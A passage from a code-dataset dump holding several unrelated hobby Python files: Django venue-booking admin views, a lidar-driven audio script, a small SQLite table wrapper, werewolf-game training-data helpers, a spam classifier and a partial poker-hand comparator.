15\n\tcurScrObj = pageNav(whoObj,currpage,perScr,perPage)\n\treturn render_to_response('/member/user_mgm.html',{'msg':msg,'messgs':curScrObj['pageObj'], 'navobj':curScrObj,'next':next})\n\ndef user_detail(request):\n\t'''\n\t這個細項頁面可以用來核發使用權\n\t'''\n\tif request.method == 'POST':\n\t\tif request.POST['submit']:\n\t\t\tuid = request.POST['u_id']\n\t\t\twhoObj = who.objects.get(u_id=uid)\n\t\t\tcForm = whoAdminForm(request.POST,instance=whoObj)\n\t\t\tif cForm.is_valid():\n\t\t\t\tcForm.save()\n\t\t\t\tmsg = u'使用者資料更新成功...'\n\t\t\t\treturn render_to_response('OK.html',{'msg':msg})\n\tnexturl = '/'\n\ttry:\n\t\tif request.GET['next']:\n\t\t\tnexturl = request.GET['next']\n\texcept:\n\t\tpass\n\t#detail for reserved place...\n\ttry:\n\t\tif request.GET['rid']:\n\t\t\trid = request.GET['rid']\n\texcept:\n\t\trid = 1\n\twhoObj = who.objects.get(u_id =rid)\n\tcForm = whoAdminForm(instance=whoObj)\n\t#need to prepare the regulation rule...\n\t\n\tmsg = u'顯示使用者資料,並且可以核發使用權'\n\treturn 
render_to_response('/member/user_detail.html',{'dspobj':whoObj,'form':cForm,'next':nexturl,'rid':rid})\n\n\ndef place_mgm(request):\n\t'''\n\t場地管理\n\t'''\n\tmsg = u'場地管理'\n\tnext = request.path\n\t\n\t#加入頁次計算,每頁5筆,每個畫面10頁\n\tnext = request.path\n\tcurrpage = 1\n\ttry:\n\t\tif request.GET['page']:\n\t\t\tcurrpage = int(request.GET.get('page', '1'))\n\texcept:\n\t\tcurrpage = 1\n\ttry:\n\t\tif request.GET['preScr']:\n\t\t\tcurScr = int(request.GET.get('preScr','0'))\n\t\t\tcurrpage = int(curScr)*10+1\n\texcept:\n\t\tcurScr = 0\n\ttry:\n\t\tif request.GET['nextScr']:\n\t\t\tnextScr = int(request.GET.get('nextScr','1'))\n\t\t\tcurrpage = int(nextScr)*10+1\n\texcept:\n\t\tnextScr = 1\n\tplaceObj = place.objects.all().order_by('-place_no')\n\tperScr = 10\n\tperPage = 5\n\tcurScrObj = pageNav(placeObj,currpage,perScr,perPage)\n\treturn render_to_response('/member/place_mgm.html',{'msg':msg,'messgs':curScrObj['pageObj'], 'navobj':curScrObj,'next':next})\n\ndef place_detail(request):\n\t'''\n\t這個細項頁面可以用來更改場地資訊\n\t'''\n\tif request.method == 'POST':\n\t\tif request.POST['submit']:\n\t\t\tp_no = request.POST['placeno']\n\t\t\tplaceobj = place.objects.get(place_no=p_no)\n\t\t\tplaceobj.name =request.POST['name']\n\t\t\tplaceobj.location = request.POST['location']\n\t\t\tplaceobj.regulation=request.POST['regulation']\n\t\t\tpgroups=''\n\t\t\ttry:\n\t\t\t\tif request.POST['place_m_groups']:\n\t\t\t\t\tpgroups = request.POST['place_m_groups']\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tif request.POST['place_groups'] != 'none':\n\t\t\t\tpgroups = request.POST['place_groups']\n\t\t\tplaceobj.place_groups = pgroups\n\t\t\tplaceobj.save()\n\t\t\tmsg = u'場地資訊新增成功...'\n\t\t\treturn render_to_response('OK.html',{'msg':msg})\n\tnexturl = '/'\n\ttry:\n\t\tif request.GET['next']:\n\t\t\tnexturl = request.GET['next']\n\texcept:\n\t\tpass\n\t#detail for reserved place...\n\ttry:\n\t\tif request.GET['rid']:\n\t\t\trid = request.GET['rid']\n\texcept:\n\t\trid = 1\n\tplaceObj = place.objects.get(place_no =rid)\n\tcForm = placeAdminForm(instance=placeObj)\n\t#got the regulations\n\trule = placeObj.regulation\n#\tdspRule = DspRule(ParseRule(rule))\n\tdspRule = ParseRule(rule)\n\tplaces = place.objects.all().values(\"place_groups\").order_by(\"place_groups\")\n\tpvalues = []\n\tfor item in places:\n\t\tpvalues.append(item['place_groups'])\n\tuniqlist = dict.fromkeys(pvalues).keys() \n\tmsg = u'場地資訊更新'\n\treturn render_to_response('/member/place_detail.html',{'msg':msg,'form':cForm,'pgroup':uniqlist,'rid':rid,'dspRule':dspRule})\n\n\ndef place_approve(request):\n\t'''\n\t場地申請審核\n\t'''\n\tmsg = u'場地申請審核'\n\t#加入頁次計算,每頁15筆,每個畫面10頁\n\tnext = request.path\n\tcurrpage = 1\n\ttry:\n\t\tif request.GET['page']:\n\t\t\tcurrpage = int(request.GET.get('page', '1'))\n\texcept:\n\t\tcurrpage = 1\n\ttry:\n\t\tif request.GET['preScr']:\n\t\t\tcurScr = int(request.GET.get('preScr','0'))\n\t\t\tcurrpage = int(curScr)*10+1\n\texcept:\n\t\tcurScr = 0\n\ttry:\n\t\tif request.GET['nextScr']:\n\t\t\tnextScr = int(request.GET.get('nextScr','1'))\n\t\t\tcurrpage = int(nextScr)*10+1\n\texcept:\n\t\tnextScr = 1\n\tmsg = u'場地使用情形'\n\tresObj = reserve.objects.all().order_by('-end_date')\n\tperScr = 10\n\tperPage = 5\n\tcurScrObj = pageNav(resObj,currpage,perScr,perPage)\n\t\n\treturn render_to_response('/member/place_approve.html',{'msg':msg,'messgs':curScrObj['pageObj'], 'navobj':curScrObj,'next':next})\n\ndef approve_detail(request):\n\t'''\n\t場地使用審核\n\t'''\n\tif request.method == 'POST':\n\t\tif request.POST['submit']:\n\t\t\trid = 
request.POST['rev_id']\n\t\t\trevObj = reserve.objects.get(r_id =rid)\n\t\t\trevObj.approve =request.POST['approve']\n\t\t\trevObj.remarks = request.POST['remarks']\n\t\t\trevObj.save()\n\t\t\tmsg = u'場地使用申請審核完成...'\n\t\t\treturn render_to_response('OK.html',{'msg':msg})\n\tnexturl = '/'\n\ttry:\n\t\tif request.GET['next']:\n\t\t\tnexturl = request.GET['next']\n\texcept:\n\t\tpass\n\t#detail for reserved place...\n\ttry:\n\t\tif request.GET['rid']:\n\t\t\trid = request.GET['rid']\n\texcept:\n\t\trid = 1\n\trevObj = reserve.objects.get(r_id =rid)\n\t\n\t#need to prepare the regulation rule...\n\tdspObj={}\n\tdspObj['department']=revObj.u_id.department\n\tdspObj['usrname']=revObj.u_id.name\n\tdspObj['usrphone']=revObj.u_id.phone\n\tdspObj['start_date']=revObj.start_date\n\tdspObj['end_date']=revObj.end_date\n\tdspObj['name']=revObj.place_no.name\n\trule = revObj.place_no.regulation\n\tdspRule = DspRule(ParseRule(rule))\n\tdspObj['regulation']=dspRule\n\tdspObj['application']=revObj.application\n\tdspObj['approve']=revObj.approve\n\tdspObj['remarks']=revObj.remarks\n\t\n\tcForm = reserveAdminForm(dspObj)\n\tmsg = u'場地使用申請細項資料'\n\treturn render_to_response('/member/approve_detail.html',{'form':cForm,'dspobj':dspObj,'msg':msg,'next':nexturl,'revid':rid})\n","sub_path":"WebApp/pools/member/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"90827434","text":"import struct\r\nimport socket\r\nimport traceback\r\nimport math\r\nimport matplotlib\r\nfrom matplotlib import pyplot as plt\r\nimport threading\r\nimport pyaudio\r\nimport numpy as np\r\nimport sklearn.cluster\r\nimport time\r\n\r\nobjlock = threading.Lock()\r\nobjects = []\r\n#fig, ax = plt.subplots()\r\n#plt.show(block=False)\r\n\r\ndef handle_points(points):\r\n # Reset switch values.\r\n points = [(*polar_to_cartesian(*p[:3]), *p) for p in points]\r\n points = [p for p in points if p[5] < 2.8 and -1 < p[2] < 1]\r\n # TODO try including reflectivity\r\n cart = [p[:3] for p in points]\r\n mcart = np.array([np.array(p) for p in cart])\r\n if not cart:\r\n return\r\n core_samples, labels = sklearn.cluster.dbscan(mcart, eps=0.2, min_samples=20)\r\n clusters = set(labels) - {-1}\r\n n_clusters = len(clusters)\r\n #ax.cla()\r\n #ax.set_xlim(-2.8, 2.8)\r\n #ax.set_ylim(-2.8, 2.8)\r\n global objects\r\n objlock.acquire(True)\r\n objects = []\r\n for i, label in enumerate(clusters):\r\n pts = mcart[labels == label]\r\n center = np.sum(pts, axis=0) / len(pts)\r\n #ax.plot([center[0]], [center[1]], 'bo')\r\n objects.append(center)\r\n objlock.release()\r\n x = [p[0] for p in cart]\r\n y = [p[1] for p in cart]\r\n hues = np.arange(n_clusters) / n_clusters\r\n colors = [matplotlib.colors.hsv_to_rgb((h, 1.0, 1.0)) for h in hues] + [(0, 0, 0)]\r\n #print(colors)\r\n #colors = ['red', 'green', 'blue', 'yellow', 'magenta', 'orange', 'gray', 'cyan', 'purple', 'gray', 'indigo', 'lime', 'navy', 'fuschia', 'black']\r\n #ax.scatter(x, y, 1, c=[colors[label] for label in labels])\r\n # im = [[0] * 4 for _ in range(4)]\r\n # for i, (x, y, _, _) in enumerate(grid):\r\n # im[y][x] = switches[i]\r\n # if switches != old_switches:\r\n # ax.imshow(im, cmap=plt.cm.binary, origin='lower')\r\n #fig.canvas.draw()\r\n #fig.canvas.flush_events()\r\n\r\ndef capture(port):\r\n soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n soc.bind(('', port))\r\n try:\r\n last_azimuth = 2*np.pi\r\n points = []\r\n while True:\r\n data = 
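Every admin view in the record above repeats one pagination scheme: 15 (or 5) rows per page, 10 pages per screen, so screen `s` starts at page `s*10 + 1`, and `preScr`/`nextScr` jump whole screens. The `pageNav` helper itself lives elsewhere in the project, so this sketch only mirrors the page/screen arithmetic the views keep re-deriving:

```python
def resolve_page(params, pages_per_screen=10):
    # Mirrors the view logic: an explicit ?page= wins; otherwise
    # ?preScr=/?nextScr= select the first page of the chosen screen.
    if "page" in params:
        return int(params["page"])
    if "preScr" in params:
        return int(params["preScr"]) * pages_per_screen + 1
    if "nextScr" in params:
        return int(params["nextScr"]) * pages_per_screen + 1
    return 1

print(resolve_page({}))                # 1
print(resolve_page({"page": "7"}))     # 7
print(resolve_page({"nextScr": "2"}))  # 21: first page of the third screen
```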
soc.recv(2000)\r\n if len(data) > 0:\r\n new_points = handle_packet(data)\r\n if not new_points:\r\n continue\r\n start_azimuth = new_points[0][0]\r\n end_azimuth = new_points[-1][0]\r\n points += new_points\r\n if end_azimuth < last_azimuth:\r\n handle_points(points)\r\n points = []\r\n last_azimuth = end_azimuth\r\n except KeyboardInterrupt as e:\r\n return\r\n\r\ndef handle_packet(data):\r\n assert len(data) == 1206, len(data)\r\n timestamp, factory = struct.unpack_from(\" 0:\r\n points.append((azimuth, altitude, dist, refl))\r\n return points\r\n\r\ndef audio_loop():\r\n p = pyaudio.PyAudio()\r\n\r\n fs = 22050\r\n stream = p.open(format=pyaudio.paFloat32,\r\n channels=1,\r\n rate=fs,\r\n output=True)\r\n\r\n chunk_size = 2048\r\n t = 0\r\n old_freq = 0\r\n mult = 0\r\n offset = 0\r\n while True:\r\n chunk = np.zeros(chunk_size)\r\n objlock.acquire(True)\r\n polars = [cartesian_to_polar(*center) for center in objects]\r\n objlock.release()\r\n polars.sort(key=lambda p: p[2])\r\n total = 0\r\n #for i, (az, alt, dist) in enumerate(polars[:1]):\r\n i = 0\r\n if not polars:\r\n stream.write(chunk.astype(np.float32).tostring())\r\n continue\r\n az, alt, dist = polars[0]\r\n #print('HELLO', i, az / (2 * np.pi), center)\r\n pc = az / (2 * np.pi) * 12\r\n freq = 440 * (2**(pc/12))\r\n shep = shepard_tones(pc)\r\n level = 1 - min(1, max(0, (dist - 0.5) / 2.3))\r\n amp = 0.1 * (np.exp(level * 2) - 1)\r\n total += amp\r\n print(i, pc, freq, amp)\r\n #print('F', pc, old_freq, freq)\r\n #freqs = np.linspace(old_freq, freq, chunk_size)\r\n old_t = t - chunk_size\r\n old_offset = offset\r\n old_mult = mult\r\n last_phase = t * old_mult + old_offset\r\n mult = freq / fs * 2 * np.pi\r\n offset = last_phase - t * mult\r\n for scale, freq_scale in [(pc / 12, 1 / 2), (1 - pc / 12, 1)]:#scale, freq in shep:\r\n last_phase = t * old_mult * freq_scale + old_offset * freq_scale\r\n tmp_offset = last_phase - t * mult * freq_scale\r\n chunk += scale / 2 * amp * np.sin((t + np.arange(chunk_size)) * mult * freq_scale + tmp_offset)\r\n print('edges', chunk[0], chunk[-1])\r\n #old_freq = freq\r\n print(total)\r\n if total > 1:\r\n chunk /= total\r\n stream.write(chunk.astype(np.float32).tostring())\r\n t += chunk_size\r\n\r\n stream.stop_stream()\r\n stream.close()\r\n\r\n p.terminate()\r\n\r\ndef shepard_tones(pc):\r\n mid_freq = 440 * (2**(pc/12))\r\n bot_freq = mid_freq / 2\r\n frac = pc / 12\r\n return ((frac, bot_freq), (1 - frac, mid_freq))\r\n\r\nif __name__ == '__main__':\r\n threading.Thread(target=audio_loop).start()\r\n capture(2368)\r\n #threading.Thread(target=lambda: capture(2368)).start()","sub_path":"shepard_scale_magic__one_object_.py","file_name":"shepard_scale_magic__one_object_.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"279328568","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Gald - a simple accounting tool\n#\n# Author: slowpoke \n#\n# This program is free software under the non-terms\n# of the Anti-License. 
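The lidar record above calls `polar_to_cartesian` and `cartesian_to_polar`, whose bodies do not survive in the text, so the following is only a plausible sketch under the conventions the rest of that code implies: azimuth sweeps the xy-plane in [0, 2*pi) (the `audio_loop` maps `az / (2*np.pi)` onto pitch classes), altitude is elevation off that plane, and `handle_points` expects `(x, y, z)` back:

```python
import numpy as np

def polar_to_cartesian(azimuth, altitude, dist):
    # Azimuth rotates in the xy-plane; altitude tilts out of it.
    x = dist * np.cos(altitude) * np.cos(azimuth)
    y = dist * np.cos(altitude) * np.sin(azimuth)
    z = dist * np.sin(altitude)
    return x, y, z

def cartesian_to_polar(x, y, z):
    # Assumes a nonzero return distance (true for kept lidar points).
    dist = np.sqrt(x * x + y * y + z * z)
    azimuth = np.arctan2(y, x) % (2 * np.pi)  # keep in [0, 2*pi)
    altitude = np.arcsin(z / dist)
    return azimuth, altitude, dist
```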
Do whatever the fuck you want.\n#\n# Github: https://www.github.com/proxypoke/Gald\n# (Shortlink: https://git.io/gald)\n\nimport database\nimport types\nfrom abc import ABCMeta, abstractmethod\n\n\n# type conversion map Python → SQLite\n_typemap = {\n type(None): \"NULL\",\n int: \"INTEGER\",\n float: \"REAL\",\n str: \"TEXT\",\n bytes: \"BLOB\"}\n\n\nclass Table(metaclass=ABCMeta):\n '''banana banana banana'''\n\n # has the table been initialized in the database yet?\n __initialized = False\n\n def __init__(self, rowid):\n self._rowid = rowid\n\n @property\n def rowid(self):\n return self._rowid\n\n @classmethod\n def _init(cls):\n '''Create a table in the database from the class' attributes.'''\n if cls.__initialized:\n return\n\n # get the column names from the class' attributes\n cols = [var.lower() for var in dir(cls)\n # exclude private attributes\n if not var.startswith(\"_\")\n # exclude methods\n and not (isinstance(getattr(cls, var), types.FunctionType)\n or isinstance(getattr(cls, var), types.MethodType))]\n attrmap = {col: getattr(cls, col) for col in cols}\n\n # begin constructing query & create all needed properties\n lines = [] # the lines inside the CREATE TABLE block\n for col, attr in attrmap.items():\n # do not process cls.rowid unless it was explicitly overwritten\n if col == \"rowid\" and type(attr) is property:\n continue\n\n # only a type was given, create a column with no default value\n if type(attr) is type:\n lines.append(cls._make_column_by_type(col, attr))\n # otherwise, try to construct a column with default value\n else:\n lines.append(cls._make_column_by_value(col, attr))\n # finally, add the new column to the class as a property\n cls._add_prop(col)\n\n query = \"CREATE TABLE IF NOT EXISTS {} (\\n\".format(cls.__name__)\n query += \",\\n\".join(lines)\n query += \" )\"\n # save the query for later review\n cls.__schema__ = property(lambda _: query)\n\n database.cursor().execute(query)\n cls.__initialized = True\n\n @classmethod\n def _add_prop(cls, col):\n '''Add a property to this class.'''\n prop = property(\n lambda self: self._get_query(col),\n lambda self, val: self._set_query(col, val))\n setattr(cls, col, prop)\n\n @classmethod\n def _make_column_by_type(cls, col, type_):\n '''Create a line for a CREATE TABLE query with only a type.'''\n t = cls._convert_or_raise(type_)\n return \"{} {}\".format(col, t)\n\n @classmethod\n def _make_column_by_value(cls, col, val):\n '''Create a line for a CREATE TABLE query with a default value.'''\n t = cls._convert_or_raise(type(val))\n return \"{} {} DEFAULT {}\".format(col, t, val)\n\n @staticmethod\n def _convert_or_raise(type_):\n '''Convert a type into a SQLite type if possible, else raise.'''\n if not type_ in _typemap:\n raise TypeError( \"Invalid type for SQLite: {}\".format(type_))\n return _typemap[type_]\n\n @classmethod\n @abstractmethod\n def new(cls, cols, vals):\n '''Create a new row in the appropriate table and return a new instance\n of the class.'''\n cls._init()\n for col in cols:\n cls._check_column(col)\n cols = \"(\" + \", \".join(cols) + \")\"\n # construct the placeholders string\n plhs = \"(\" + \", \".join([\"?\" for _ in range(len(vals))]) + \")\"\n query = 'INSERT INTO {} {} VALUES {}'.format(cls.__name__, cols, plhs)\n c = database.cursor()\n c.execute(query, vals)\n return cls(c.lastrowid)\n\n @classmethod\n def _check_column(cls, column):\n if column not in database.get_column_names(cls.__name__):\n raise ValueError(\"Invalid column name: {}\".format(column))\n\n def _get_query(self, 
column):\n '''Construct a getter query with sanitized inputs.'''\n column = column.lower()\n self._check_column(column)\n c = database.cursor()\n return c.execute(\"SELECT {} FROM {} WHERE _rowid_ = ?\".format(\n column, self.__class__.__name__),\n (self.rowid,)).fetchone()[0]\n\n def _set_query(self, column, value):\n '''Construct a setter query with sanitized inputs.'''\n column = column.lower()\n self._check_column(column)\n c = database.cursor()\n return c.execute(\"UPDATE {} SET {} = ? WHERE _rowid_ = ?\".format(\n self.__class__.__name__, column), (value, self.rowid))\n","sub_path":"table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"155033909","text":"import sys\nimport glob\nimport os\nimport shutil\n\n\n# ログフォルダ内の全ファイル名をFILE_LISTに格納\ndef setLogPath(PLAY_NUM, YEAR):\n LOG_PATH = glob.glob(\n sys.path[0] + \"/../data/log/{}/{}/*\".format(PLAY_NUM, YEAR))\n return LOG_PATH\n\n\n# 「START_TURN-END_TURN」フォルダを作成する\n# SAVE_PATHをセットする\ndef setSavePath(PLAY_NUM, YEAR, TYPE, FOLDER_NAME, START_TURN, END_TURN):\n SAVE_PATH = sys.path[0] + \"/../data/train/{}/{}/{}/{}/{}/{}\".format(\n PLAY_NUM, YEAR, TYPE, FOLDER_NAME, START_TURN, END_TURN)\n if not os.path.exists(SAVE_PATH):\n os.makedirs(SAVE_PATH)\n else:\n shutil.rmtree(SAVE_PATH)\n\n return SAVE_PATH\n\n\n# 学習データ用にLSTM_INFO内の値をTRAIN_LISTに格納する\ndef setTrainList(LSTM_INFO, TRAIN_LIST, START_TURN):\n turn = START_TURN # ターン用\n for lstm_info in LSTM_INFO.values(): # {\"ターン\":{}}\n for info in lstm_info.values(): # {\"プレイヤー\":[]}\n for val in info.values():\n for i in val:\n TRAIN_LIST[str(turn)].append(i)\n turn += 1\n\n\n# 各特徴量を入れる配列の添字を振り分ける\ndef setSubscript(FEATURE_LIST):\n ref_num = 0\n for feature, val in FEATURE_LIST.items():\n if val[0]:\n if type(val[1]) == dict:\n for feature2, val2 in val[1].items():\n if val2[0]:\n if type(val2[1]) == dict:\n for role, j in val2[1].items():\n if j[0]:\n j[1][feature2] = ref_num\n ref_num += 1\n else:\n val2[1] = ref_num\n ref_num += 1\n else:\n val[1] = ref_num\n ref_num += 1\n\n\n# ROLE辞書に特徴名を追加\ndef setRoleFeature(feature, role):\n for val in role.values():\n if val[0]:\n val[1][feature] = None\n # print(DIVINED_ROLE)\n\n\n# トーク履歴を追加する\ndef setTalkHistroy(text, TALK_HISTROY):\n remark = text[5].split()\n idx = text[4] # 発言したプレイヤー番号\n idt = text[2] # トークのID\n day = text[0] # 日にち\n TALK_HISTROY[day][idt] = int(idx)\n\n\n# 使用する特徴量の数を計算\ndef setFeatureNum(FEATURE_LIST):\n count = 0\n for val in FEATURE_LIST.values():\n if val[0]:\n if type(val[1]) == dict:\n for feature, i in val[1].items():\n if i[0]:\n if type(i[1]) == dict:\n setRoleFeature(feature, i[1])\n for j in i[1].values():\n if j[0]:\n count += 1\n else:\n count += 1\n else:\n count += 1\n # print(FEATUER_NUM)\n return count\n\n\n# PARAMに値を格納\ndef setParam(PARAM, FEATUER_NUM, PLAY_NUM, START_TURN, END_TURN, DAY_NUM):\n PARAM[\"input\"] = FEATUER_NUM * PLAY_NUM\n PARAM[\"output\"] = PLAY_NUM\n PARAM[\"len_t\"] = (END_TURN - START_TURN + 1) * DAY_NUM\n # print(PARAM)\n # sys.exit()\n\n\n# NOT_INFOにプレイヤー番号と-1を書き込む\ndef setNotInfo(PLAY_NUM, FEATUER_NUM, NOT_INFO):\n for p in range(1, PLAY_NUM+1):\n NOT_INFO[str(p)] = []\n for j in range(FEATUER_NUM):\n NOT_INFO[str(p)].append(-1)\n","sub_path":"app/LSTM1205/createDataFunc/setFunc.py","file_name":"setFunc.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
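The `_typemap` in the table module above is the entire bridge from Python types to SQLite column types. A self-contained sketch of the same idea directly against the standard `sqlite3` module, with a hypothetical `expense` table standing in for the project's own `database` wrapper:

```python
import sqlite3

TYPEMAP = {type(None): "NULL", int: "INTEGER", float: "REAL",
           str: "TEXT", bytes: "BLOB"}

def create_table(conn, name, columns):
    # columns: {column_name: python_type}; mirrors Table._init's
    # CREATE TABLE construction, minus default values.
    cols = ",\n".join("{} {}".format(col, TYPEMAP[t])
                      for col, t in columns.items())
    conn.execute("CREATE TABLE IF NOT EXISTS {} (\n{} )".format(name, cols))

conn = sqlite3.connect(":memory:")
create_table(conn, "expense", {"amount": float, "note": str})
conn.execute("INSERT INTO expense (amount, note) VALUES (?, ?)", (9.5, "coffee"))
print(conn.execute("SELECT * FROM expense").fetchall())  # [(9.5, 'coffee')]
```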
+{"seq_id":"494374368","text":"\"\"\"Python Spam Detector\nImplemented with Naive Bayes (MultiNomialNB) and AdaBoost.\nThe Sklearn Documentation notes that this class is suitable for \"classification with \ndiscrete features (e.g. word counts for text classification). The multinomial \ndistribution normally requires integer feature counts. However, in practice, \nfractional counts such as tf-idf may also work.\"\n\nThe preprocessed data set is taken from the UCI Machine Learning Repository. \nSpecifically, the Spambase Data Set: https://archive.ics.uci.edu/ml/datasets/spambase.\n\"\"\"\n\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.ensemble import AdaBoostClassifier\nimport pandas as pd \nimport numpy as np \n\ndata = pd.read_csv('spambase/spambase.data').values\nnp.random.shuffle(data) #inplace shuffle of data (row) \n\n# first 48 columns is input \nX = data[:, :48]\ny = data[:, -1]\n\n# last 100 rows is test set \nX_train = X[:-100,]\ny_train = y[:-100,]\nX_test = X[-100:,]\ny_test = y[-100:,]\n\n# Instantiate object \nmodel = MultinomialNB()\nmodel.fit(X_train, y_train)\nprint(\"Classification rate for Naive Bayes: \", model.score(X_test, y_test))\n\n\n# Run same data on AdaBoost Classifier\nmodel = AdaBoostClassifier()\nmodel.fit(X_train,y_train)\nprint(\"Classification rate for AdaBoost: \", model.score(X_test, y_test))\n\n\n","sub_path":"SpamDetection/spamdetectornb.py","file_name":"spamdetectornb.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"458827615","text":"#cards = '2H 4D 3C 6S 5H'\n'''\npokers类的作用\n整理手牌顺序、判断手牌类型\n四个数字相同的牌按三条处理\n'''\nclass pokers():\n def __init__(self,name=None,cards=None):\n self.pokersType = {'散牌':1,'对子':2,'两对':3,\n '三条':4,'顺子':5,'同花':6,\n '同花顺':7}\n self.pokersNum = {'2':2,'3':3,'4':4,'5':5,\n '6':6,'7':7,'8':8,'9':9,\n 'T':10,'J':11,'Q':12,'K':13,\n 'A':14}\n self.pokersCol ={ 'S':4, #黑桃\n 'H':3, #红桃\n 'D':2, #方片\n 'C':1 #梅花 \n }\n\n self.name = name #持牌者名称\n self.cards = self.sortCards(cards) #所持手牌\n self.cardsNumList= []\n self.cardsColList = []\n self.cardsNumSet = {}\n self.cardsNumSetLen = 0\n self.cardsColSet = {}\n self.cardsColSetLen = 0\n \n self.cardsType = self.getCardsType(cards) #所持手牌类型\n\n\n\n def sortCards(self,cards):\n cardsList = cards.split(' ')\n cards = []\n for card in cardsList:\n cardTuple = (self.pokersNum[card[0]],self.pokersCol[card[1]])\n cards.append(cardTuple)\n cards.sort( key = lambda x : (x[0], x[1]) )\n self.cards =cards\n return cards\n \n def getCardsType(self,cards):\n cards = self.sortCards(cards)\n cardsNumList= []\n cardsColList = []\n cardsType = None\n \n for card in cards:\n cardsNumList.append(card[0])\n cardsColList.append(card[1])\n \n self.cardsNumList = cardsNumList\n self.cardsColList = cardsColList\n cardsNumSet = set(cardsNumList)\n cardsColSet = set(cardsColList)\n\n self.cardsNumSet = cardsNumSet\n self.cardsColSet = cardsColSet\n\n cardsNumSetLen = len(cardsNumSet)\n cardsColSetLen = len(cardsColSet)\n self.cardsNumSetLen = cardsNumSetLen\n self.cardsColSetLen = cardsColSetLen\n\n\n if cardsColSetLen == 1:\n isStraigh = True\n i = 0\n while i < 4:\n if cardsNumList[i+1] - cardsNumList[i] != 1:\n isStraigh = False\n break\n i += 1\n if isStraigh and cardsColSetLen==1: #同花顺\n cardsType = 7\n else:\n cardsType = 6 #同花\n\n else:\n #set长度为5可能为 散牌、顺子\n if cardsNumSetLen==5:\n isStraigh = True\n i = 0\n while i < 4:\n if cardsNumList[i+1] - cardsNumList[i] != 1:\n isStraigh = False\n break\n i 
+= 1\n if isStraigh: #顺子\n cardsType = 5\n else:\n cardsType = 1 #散牌\n\n elif cardsNumSetLen== 4: #对子\n cardsType = 2\n \n else: #cardsNumSetLen==3 or 2 可能为两对或三条\n isTwoPairsTest = True\n for i in cardsNumSet:\n if cardsNumList.count(i) >= 3: #四个数字相同的牌按三条处理\n isTwoPairsTest = False\n break\n if isTwoPairsTest: #两对\n cardsType = 3 \n else: #三条\n cardsType = 4\n \n self.cardsType = cardsType\n return cardsType\n \n \n'''\npokersCmp类的作用\n比较两手牌的大小\n'''\nclass pokersCmp():\n def cmp_ReturnWinnerName(self,B_pokers,W_pokers):\n if B_pokers.cardsType > W_pokers.cardsType:\n return B_pokers.name\n elif B_pokers.cardsType < W_pokers.cardsType:\n return W_pokers.name\n else:\n cardsType = B_pokers.cardsType\n if cardsType == 7:\n return self.straightFlushCmp(B_pokers,W_pokers)\n elif cardsType == 6:\n return self.suitCmp(B_pokers,W_pokers)\n elif cardsType == 5:\n return self.straightCmp(B_pokers,W_pokers)\n elif cardsType == 4:\n return self.threeOfAKindCmp(B_pokers,W_pokers)\n elif cardsType == 3:\n return self.twoPairsCmp(B_pokers,W_pokers)\n elif cardsType == 2:\n return self.onePairsCmp(B_pokers,W_pokers)\n elif cardsType == 1:\n return self.cardCmp(B_pokers,W_pokers)\n \n\n def mainCmp(self,Input):\n B_name = Input[0:5]\n W_name = Input[22:27]\n B_cards = Input[7:21]\n W_cards = Input[29:43]\n output = 'Tie'\n\n B_pokers = pokers(B_name ,B_cards)\n W_pokers = pokers(W_name,W_cards)\n winner = self.cmp_ReturnWinnerName(B_pokers,W_pokers)\n if winner != 'Tie':\n output = winner + \" wins\"\n return output\n \n\n\n \n\n\n def straightFlushCmp(self,B_pokers,W_pokers):\n return self.cardCmp(B_pokers,W_pokers)\n\n def suitCmp(self,B_pokers,W_pokers):\n return self.cardCmp(B_pokers,W_pokers)\n def straightCmp(self,B_pokers,W_pokers):\n return self.cardCmp(B_pokers,W_pokers)\n\n def threeOfAKindCmp(self,B_pokers,W_pokers):\n B_cardsNumSet = B_pokers.cardsNumSet\n B_cardsNumList = B_pokers.cardsNumList\n B_num = None\n\n for i in B_cardsNumSet:\n if B_cardsNumList.count(i) >=3:\n B_num = i\n break\n \n W_cardsNumSet = W_pokers.cardsNumSet\n W_cardsNumList = W_pokers.cardsNumList\n W_num = None\n\n for i in W_cardsNumSet:\n if W_cardsNumList.count(i) >=3:\n W_num = i\n break\n \n if B_num > W_num:\n return B_pokers.name\n elif B_num < W_num:\n return W_pokers.name\n else:\n return 'Tie'\n \n\n def twoPairsCmp(self,B_pokers,W_pokers):\n return self.pairsCmp(B_pokers,W_pokers)\n def onePairsCmp(self,B_pokers,W_pokers):\n return self.pairsCmp(B_pokers,W_pokers)\n\n def pairsCmp(self,B_pokers,W_pokers):\n winner = None\n B_cardsNumSet = B_pokers.cardsNumSet\n B_cardsNumList = B_pokers.cardsNumList\n B_cardsNumCountDic = {}\n \n for i in B_cardsNumSet:\n B_cardsNumCountDic[i] = B_cardsNumList.count(i)\n\n W_cardsNumSet = W_pokers.cardsNumSet\n W_cardsNumList = W_pokers.cardsNumList\n W_cardsNumCountDic = {}\n\n for i in W_cardsNumSet:\n B_cardsNumCountDic[i] = B_cardsNumList.count(i)\n \n if B_pokers.cardsType == 4:\n B_num = None\n W_num = None\n for i in B_cardsNumSet:\n if B_cardsNumCountDic[i] >=3:\n B_num = i\n break\n for i in W_cardsNumSet:\n if W_cardsNumCountDic[i] >=3:\n W_num = i\n break\n if B_num > W_num:\n winner = B_pokers\n elif B_num < W_num:\n winner = W_pokers\n else:\n pass\n\n elif B_pokers.cardsType == 3 or B_pokers.cardsType == 2:\n B_paris = []\n B_one_cards = []\n\n for i in B_cardsNumSet:\n if B_cardsNumList.count(i) == 2:\n B_paris.append(i)\n else:\n B_one_cards.append(i)\n W_paris = []\n W_one_cards = []\n for i in W_cardsNumSet:\n if W_cardsNumList.count(i) == 2:\n 
